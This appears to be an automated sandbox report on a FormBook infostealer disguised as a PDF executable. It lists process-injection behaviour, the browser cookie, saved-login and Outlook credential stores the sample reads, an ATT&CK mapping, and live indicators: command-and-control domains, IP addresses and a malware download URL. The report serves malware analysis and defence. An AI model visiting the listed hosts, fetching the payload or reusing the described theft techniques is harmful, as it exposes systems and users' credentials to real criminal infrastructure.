                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\recover.exeThread register set: target process: 1360Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\recover.exeThread APC queued: target process: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B75008Jump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B38C93 LogonUserW,0_2_00B38C93
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE3B4C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AE4A35
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B44EF5 mouse_event,0_2_00B44EF5
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeProcess created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B381F7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B44C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B44C03
                Source: SC_TR11670000_pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: SC_TR11670000_pdf.exe, oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0886B cpuid 0_2_00B0886B
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B150D7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B22230 GetUserNameW,0_2_00B22230
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B1418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B1418A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AE4AFE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: SC_TR11670000_pdf.exeBinary or memory string: WIN_81
                Source: SC_TR11670000_pdf.exeBinary or memory string: WIN_XP
                Source: SC_TR11670000_pdf.exeBinary or memory string: WIN_XPe
                Source: SC_TR11670000_pdf.exeBinary or memory string: WIN_VISTA
                Source: SC_TR11670000_pdf.exeBinary or memory string: WIN_7
                Source: SC_TR11670000_pdf.exeBinary or memory string: WIN_8
                Source: SC_TR11670000_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B56596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B56596
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B56A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B56A5A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574654 Sample: SC_TR11670000_pdf.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 29 www.tlcatlas.xyz 2->29 31 www.030002128.xyz 2->31 33 17 other IPs or domains 2->33 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 5 other signatures 2->53 10 SC_TR11670000_pdf.exe 4 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 signatures5 65 Binary is likely a compiled AutoIt script file 10->65 67 Writes to foreign memory regions 10->67 69 Maps a DLL or memory area into another process 10->69 71 Switches to a custom stack to bypass stack traces 10->71 13 svchost.exe 10->13         started        process6 signatures7 73 Maps a DLL or memory area into another process 13->73 16 oCCZhsVsNwIIN.exe 13->16 injected process8 signatures9 43 Found direct / indirect Syscall (likely to bypass EDR) 16->43 19 recover.exe 13 16->19         started        process10 dnsIp11 35 45.200.148.45, 49836, 49886, 80 Africa-on-Cloud-ASZA Seychelles 19->35 55 Tries to steal Mail credentials (via file / registry access) 19->55 57 Tries to harvest and steal browser information (history, passwords, etc) 19->57 59 Modifies the context of a thread in another process (thread injection) 19->59 61 3 other signatures 19->61 23 oCCZhsVsNwIIN.exe 19->23 injected 27 firefox.exe 19->27         started        signatures12 process13 dnsIp14 37 stationseek.online 198.251.84.200, 50034, 50035, 50036 PONYNETUS United States 23->37 39 solarand.online 217.160.0.60, 50038, 50039, 50040 ONEANDONE-ASBrauerstrasse48DE Germany 23->39 41 8 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SC_TR11670000_pdf.exe76%ReversingLabsWin32.Trojan.Strab
                SC_TR11670000_pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.030002059.xyz0%Avira URL Cloudsafe
                http://45.200.148.45/dashboard/xl.exe&0%Avira URL Cloudsafe
                http://www.030002059.xyz/er88/0%Avira URL Cloudsafe
                http://www.basicreviews.online/r67x/0%Avira URL Cloudsafe
                http://45.200.148.45/dashboard/xl.exe100%Avira URL Cloudmalware
                http://www.sortcouponspot.shop/90oi/0%Avira URL Cloudsafe
                http://www.tenmyk.shop/irzc/0%Avira URL Cloudsafe
                http://www.030002128.xyz/fc2m/0%Avira URL Cloudsafe
                http://www.stationseek.online/3qlo/0%Avira URL Cloudsafe
                http://www.tdassetmgt.info/d55l/0%Avira URL Cloudsafe
                http://www.tlcatlas.xyz/fhx4/0%Avira URL Cloudsafe
                http://www.quicktraze.website/0b3u/0%Avira URL Cloudsafe
                http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS0%Avira URL Cloudsafe
                http://www.solarand.online/tycs/0%Avira URL Cloudsafe
                http://www.idsmart.online/jbgy/?9B_ppt=WpM0%Avira URL Cloudsafe
                http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYz0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                tlcatlas.xyz
                		3.33.130.190
                		truetrue
                  		unknown
                  tdassetmgt.info
                  		3.33.130.190
                  		truetrue
                    		unknown
                    solarand.online
                    		217.160.0.60
                    		truetrue
                      		unknown
                      www.sortcouponspot.shop
                      		172.67.158.234
                      		truetrue
                        		unknown
                        www.xphone.net
                        		13.248.169.48
                        		truetrue
                          		unknown
                          basicreviews.online
                          		144.76.190.39
                          		truetrue
                            		unknown
                            www.030002128.xyz
                            		161.97.142.144
                            		truetrue
                              		unknown
                              www.quicktraze.website
                              		209.74.64.58
                              		truetrue
                                		unknown
                                www.tenmyk.shop
                                		104.21.74.79
                                		truetrue
                                  		unknown
                                  www.030002059.xyz
                                  		161.97.142.144
                                  		truetrue
                                    		unknown
                                    www.idsmart.online
                                    		15.204.67.7
                                    		truefalse
                                      		unknown
                                      stationseek.online
                                      		198.251.84.200
                                      		truetrue
                                        		unknown
                                        www.salju777-rtp.click
                                        		172.67.149.64
                                        		truetrue
                                          		unknown
                                          www.solarand.online
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.stationseek.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.89180.app
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.tlcatlas.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.tdassetmgt.info
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.basicreviews.online
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.basicreviews.online/r67x/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.030002128.xyz/fc2m/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sortcouponspot.shop/90oi/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tenmyk.shop/irzc/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://45.200.148.45/dashboard/xl.exefalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.stationseek.online/3qlo/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tdassetmgt.info/d55l/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.030002059.xyz/er88/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tlcatlas.xyz/fhx4/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.quicktraze.website/0b3u/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.solarand.online/tycs/true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabrecover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.030002059.xyzoCCZhsVsNwIIN.exe, 00000007.00000002.4206800241.0000000004C6E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://45.200.148.45/dashboard/xl.exe&recover.exe, 00000003.00000003.3092659925.0000000003371000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003371000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrecover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.idsmart.online/jbgy/?9B_ppt=WpMfirefox.exe, 00000008.00000002.2219879934.0000000025054000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxSrecover.exe, 00000003.00000002.4205854920.0000000005106000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000039C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYzrecover.exe, 00000003.00000002.4205854920.0000000004DE2000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000036A2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.strato.deoCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.0000000003B58000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        13.248.169.48
                                                                        		www.xphone.netUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        161.97.142.144
                                                                        		www.030002128.xyzUnited States
                                                                        		51167CONTABODEtrue
                                                                        15.204.67.7
                                                                        		www.idsmart.onlineUnited States
                                                                        		71HP-INTERNET-ASUSfalse
                                                                        45.200.148.45
                                                                        		unknownSeychelles
                                                                        		328608Africa-on-Cloud-ASZAfalse
                                                                        172.67.158.234
                                                                        		www.sortcouponspot.shopUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        144.76.190.39
                                                                        		basicreviews.onlineGermany
                                                                        		24940HETZNER-ASDEtrue
                                                                        209.74.64.58
                                                                        		www.quicktraze.websiteUnited States
                                                                        		31744MULTIBAND-NEWHOPEUStrue
                                                                        217.160.0.60
                                                                        		solarand.onlineGermany
                                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                        3.33.130.190
                                                                        		tlcatlas.xyzUnited States
                                                                        		8987AMAZONEXPANSIONGBtrue
                                                                        104.21.74.79
                                                                        		www.tenmyk.shopUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        198.251.84.200
                                                                        		stationseek.onlineUnited States
                                                                        		53667PONYNETUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1574654
                                                                        Start date and time:2024-12-13 13:05:16 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 11m 1s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:SC_TR11670000_pdf.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/5@15/11
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 92%
                                                                        • Number of executed functions: 59
                                                                        • Number of non-executed functions: 270
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • VT rate limit hit for: SC_TR11670000_pdf.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        07:07:08API Interceptor11650950x Sleep call for process: recover.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        13.248.169.48RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                        • www.krshop.shop/5p01/
                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                        • sharewood.xyz/administrator/index.php
                                                                        MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.snyp.shop/4nyz/
                                                                        Recibos.exeGet hashmaliciousFormBookBrowse
                                                                        • www.egyshare.xyz/lp5b/
                                                                        AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                        • www.avalanchefi.xyz/ctta/
                                                                        AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                        • www.avalanchefi.xyz/ctta/
                                                                        Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                        • www.hsa.world/09b7/
                                                                        MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                        • www.lovel.shop/rxts/
